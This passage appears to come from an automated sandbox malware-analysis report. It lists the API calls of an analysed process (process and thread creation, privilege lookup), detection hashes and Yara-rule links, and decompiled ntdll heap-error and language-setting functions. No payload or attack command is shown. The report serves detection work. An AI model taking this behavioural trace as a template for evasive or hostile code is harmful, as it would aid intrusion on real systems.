                                                                                                                                • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                                                                                                • Instruction Fuzzy Hash: 120112B5D0020DBBDF10EBE5DC82F9EB7789B54308F004196AA1997241F671EB14D791
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00CE8930, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00CE8984
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                • Instruction ID: 7cbd20736793c2533837630c8424da1404c52206a080975612fdc65fbc056bb5
                                                                                                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                • Instruction Fuzzy Hash: D101B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97251D630E851CBA4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00CE7400, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00CDCCE0,?,?), ref: 00CE743C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                • Opcode ID: cd09e7ef73cabc43a717670ae7e1ce4ae249577e2b69b5c20a1f9f4a96e7209c
                                                                                                                                • Instruction ID: fd1939c24f51e40bf46331746646d0fd9356d9217e1b603192001590eca4df6e
                                                                                                                                • Opcode Fuzzy Hash: cd09e7ef73cabc43a717670ae7e1ce4ae249577e2b69b5c20a1f9f4a96e7209c
                                                                                                                                • Instruction Fuzzy Hash: 01E092333803443AE330659A9C03FA7B39CCB91B30F540026FB0DEB2C1E5A5F90142A9
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00CE73F3, Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00CDCCE0,?,?), ref: 00CE743C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                • Opcode ID: 49df2ebafb8638cfee04bfba27763fb929f190c0d5475e25ba3ea96ea82885c3
                                                                                                                                • Instruction ID: c7213a2d3968d22ead180dc338fcf5e0010ece65c1d7f031c5310f2b1b500e02
                                                                                                                                • Opcode Fuzzy Hash: 49df2ebafb8638cfee04bfba27763fb929f190c0d5475e25ba3ea96ea82885c3
                                                                                                                                • Instruction Fuzzy Hash: 0CF0A7326813807FD7319A698C43FE777699F91B10F180159F609AB1C1D6A5B9018795
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00CE8880, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlAllocateHeap.NTDLL(00CE3526,?,00CE3C9F,00CE3C9F,?,00CE3526,?,?,?,?,?,00000000,00000000,?), ref: 00CE88AD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                • Instruction ID: d63aa87d1fe5c42910e298dfe7472afa015d9862abae4b94d5d459fe60a6c727
                                                                                                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                • Instruction Fuzzy Hash: 12E012B1200208ABDB24EF99CC45EAB77ADEF88650F118558BA085B242CA30F910CAF0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00CE8A20, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,00CDCFB2,00CDCFB2,?,00000000,?,?), ref: 00CE8A50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3899507212-0
                                                                                                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                • Instruction ID: 7cb9ded1c1df881f5f93e84bda19305d0962d29f91dc7fcc266fbc0590cde888
                                                                                                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                • Instruction Fuzzy Hash: AAE01AB1200208ABDB20DF49CC85EEB37ADEF89650F018154BA0857241D930E8108BF5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00CDD420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,00CD7C83,?), ref: 00CDD44B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorMode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                • Opcode ID: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                                                                                                                • Instruction ID: 7889d7fbec9a01805e5852199961d7278533ead9a3e7a1762c741c6c3a139b8b
                                                                                                                                • Opcode Fuzzy Hash: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                                                                                                                • Instruction Fuzzy Hash: 31D0A7717503443BE710FAA49C07F2672CC5B44B00F494074FA49D73C3D964F9004161
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F2967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 7b9a418c3f619ca1d2790dcca3bf5c0d00d87bdcf7bfbcf16367980f954b6def
                                                                                                                                • Instruction ID: b5c8e4a7810d9a99a0ad6bff4866e0fb0ef55d363742965661c81164deb89229
                                                                                                                                • Opcode Fuzzy Hash: 7b9a418c3f619ca1d2790dcca3bf5c0d00d87bdcf7bfbcf16367980f954b6def
                                                                                                                                • Instruction Fuzzy Hash: DEB09BB1D414D5C9F711D7604708B177D4077D0746F16C061D1021751A4778D196F5B5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Non-executed Functions

                                                                                                                                Function 04F9B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 04F9B53F
                                                                                                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 04F9B2DC
                                                                                                                                • Go determine why that thread has not released the critical section., xrefs: 04F9B3C5
                                                                                                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 04F9B39B
                                                                                                                                • read from, xrefs: 04F9B4AD, 04F9B4B2
                                                                                                                                • *** then kb to get the faulting stack, xrefs: 04F9B51C
                                                                                                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04F9B38F
                                                                                                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 04F9B305
                                                                                                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 04F9B314
                                                                                                                                • The instruction at %p referenced memory at %p., xrefs: 04F9B432
                                                                                                                                • *** enter .cxr %p for the context, xrefs: 04F9B50D
                                                                                                                                • <unknown>, xrefs: 04F9B27E, 04F9B2D1, 04F9B350, 04F9B399, 04F9B417, 04F9B48E
                                                                                                                                • an invalid address, %p, xrefs: 04F9B4CF
                                                                                                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 04F9B476
                                                                                                                                • *** enter .exr %p for the exception record, xrefs: 04F9B4F1
                                                                                                                                • *** An Access Violation occurred in %ws:%s, xrefs: 04F9B48F
                                                                                                                                • write to, xrefs: 04F9B4A6
                                                                                                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 04F9B323
                                                                                                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 04F9B352
                                                                                                                                • The instruction at %p tried to %s , xrefs: 04F9B4B6
                                                                                                                                • This failed because of error %Ix., xrefs: 04F9B446
                                                                                                                                • a NULL pointer, xrefs: 04F9B4E0
                                                                                                                                • The resource is owned exclusively by thread %p, xrefs: 04F9B374
                                                                                                                                • The resource is owned shared by %d threads, xrefs: 04F9B37E
                                                                                                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 04F9B2F3
                                                                                                                                • The critical section is owned by thread %p., xrefs: 04F9B3B9
                                                                                                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 04F9B47D
                                                                                                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 04F9B484
                                                                                                                                • *** Inpage error in %ws:%s, xrefs: 04F9B418
                                                                                                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04F9B3D6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                                • API String ID: 0-108210295
                                                                                                                                • Opcode ID: e57752e9031fbfa945c73e4b7595108d10215e3cf05380789d71c34a793cd662
                                                                                                                                • Instruction ID: 47d89d4268a6d7e5aa8d4809d244b88aed188951c6d1e562644645a807a3caf6
                                                                                                                                • Opcode Fuzzy Hash: e57752e9031fbfa945c73e4b7595108d10215e3cf05380789d71c34a793cd662
                                                                                                                                • Instruction Fuzzy Hash: D3810475A40200FFFF2A9F09AC49E6B3B76FF46B56F005045F5042B112E265B813EAB2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04FA1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 44%
                                                                                                                                			E04FA1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x4ec48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04EEB150();
				} else {
					E04EEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x4fd589c);
				E04EEB150("Heap error detected at %p (heap handle %p)\n",  *0x4fd58a0);
				_t27 =  *0x4fd5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M04FA1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04EEB150();
				} else {
					E04EEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E04EEB150("Error code: %d - %s\n",  *0x4fd5898);
				_t113 =  *0x4fd58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04EEB150();
					} else {
						E04EEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04EEB150("Parameter1: %p\n",  *0x4fd58a4);
				}
				_t115 =  *0x4fd58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04EEB150();
					} else {
						E04EEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04EEB150("Parameter2: %p\n",  *0x4fd58a8);
				}
				_t117 =  *0x4fd58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04EEB150();
					} else {
						E04EEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04EEB150("Parameter3: %p\n",  *0x4fd58ac);
				}
				_t119 =  *0x4fd58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04EEB150();
					} else {
						E04EEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x4fd58b4);
					E04EEB150("Last known valid blocks: before - %p, after - %p\n",  *0x4fd58b0);
				} else {
					_t120 =  *0x4fd58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04EEB150();
				} else {
					E04EEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E04EEB150("Stack trace available at %p\n", 0x4fd58c0);
			}











                                                                                                                                0x04fa1c10
                                                                                                                                0x04fa1c16
                                                                                                                                0x04fa1c1e
                                                                                                                                0x04fa1c3d
                                                                                                                                0x04fa1c3e
                                                                                                                                0x04fa1c20
                                                                                                                                0x04fa1c35
                                                                                                                                0x04fa1c3a
                                                                                                                                0x04fa1c44
                                                                                                                                0x04fa1c55
                                                                                                                                0x04fa1c5a
                                                                                                                                0x04fa1c65
                                                                                                                                0x04fa1c67
                                                                                                                                0x00000000
                                                                                                                                0x04fa1c6e
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04fa1c67
                                                                                                                                0x04fa1cdc
                                                                                                                                0x04fa1ce5
                                                                                                                                0x04fa1d04
                                                                                                                                0x04fa1d05
                                                                                                                                0x04fa1ce7
                                                                                                                                0x04fa1cfc
                                                                                                                                0x04fa1d01
                                                                                                                                0x04fa1d0b
                                                                                                                                0x04fa1d17
                                                                                                                                0x04fa1d1f
                                                                                                                                0x04fa1d25
                                                                                                                                0x04fa1d30
                                                                                                                                0x04fa1d4f
                                                                                                                                0x04fa1d50
                                                                                                                                0x04fa1d32
                                                                                                                                0x04fa1d47
                                                                                                                                0x04fa1d4c
                                                                                                                                0x04fa1d61
                                                                                                                                0x04fa1d67
                                                                                                                                0x04fa1d68
                                                                                                                                0x04fa1d6e
                                                                                                                                0x04fa1d79
                                                                                                                                0x04fa1d98
                                                                                                                                0x04fa1d99
                                                                                                                                0x04fa1d7b
                                                                                                                                0x04fa1d90
                                                                                                                                0x04fa1d95
                                                                                                                                0x04fa1daa
                                                                                                                                0x04fa1db0
                                                                                                                                0x04fa1db1
                                                                                                                                0x04fa1db7
                                                                                                                                0x04fa1dc2
                                                                                                                                0x04fa1de1
                                                                                                                                0x04fa1de2
                                                                                                                                0x04fa1dc4
                                                                                                                                0x04fa1dd9
                                                                                                                                0x04fa1dde
                                                                                                                                0x04fa1df3
                                                                                                                                0x04fa1df9
                                                                                                                                0x04fa1dfa
                                                                                                                                0x04fa1e00
                                                                                                                                0x04fa1e0a
                                                                                                                                0x04fa1e13
                                                                                                                                0x04fa1e32
                                                                                                                                0x04fa1e33
                                                                                                                                0x04fa1e15
                                                                                                                                0x04fa1e2a
                                                                                                                                0x04fa1e2f
                                                                                                                                0x04fa1e39
                                                                                                                                0x04fa1e4a
                                                                                                                                0x04fa1e02
                                                                                                                                0x04fa1e02
                                                                                                                                0x04fa1e08
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04fa1e08
                                                                                                                                0x04fa1e5b
                                                                                                                                0x04fa1e7a
                                                                                                                                0x04fa1e7b
                                                                                                                                0x04fa1e5d
                                                                                                                                0x04fa1e72
                                                                                                                                0x04fa1e77
                                                                                                                                0x04fa1e95

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                                                • API String ID: 0-2897834094
                                                                                                                                • Opcode ID: 65b8c3e6b774c553ac66e7e9ec343ae940b5b7b4cfb23f3a10774e12df3c15f1
                                                                                                                                • Instruction ID: b1448ec6314a9e29514491e43886ae2ad948e6eaabf7b3c0e98ea21a9aab3a6f
                                                                                                                                • Opcode Fuzzy Hash: 65b8c3e6b774c553ac66e7e9ec343ae940b5b7b4cfb23f3a10774e12df3c15f1
                                                                                                                                • Instruction Fuzzy Hash: 7561F873A12949DFE311DB99D689E3273A5E704A70F0AA47EF4095F300D625BC638E0A
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EF3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 96%
                                                                                                                                			E04EF3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E04EF1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E04EF1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E04EF1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E04EF1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E04EF1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L04F04620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E04F2F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E04F31370(_t276, 0x4ec4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E04F2BB40(0,  &_v68, _t170);
									if(L04EF43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E04F2BB40(_t257,  &_v68, _t243);
								if(L04EF43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E04F31370(_t278, 0x4ec4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L04F04620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E04F2F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E04F31370(_v16, 0x4ec4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E04F2BB40(_t262,  &_v68, _t244);
								if(L04EF43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E04F31370(_t282, 0x4ec4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E04F2BB40(_t262,  &_v68, _t201);
							if(L04EF43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L04F04620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E04F2F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E04F31370(_t280, 0x4ec4e90);
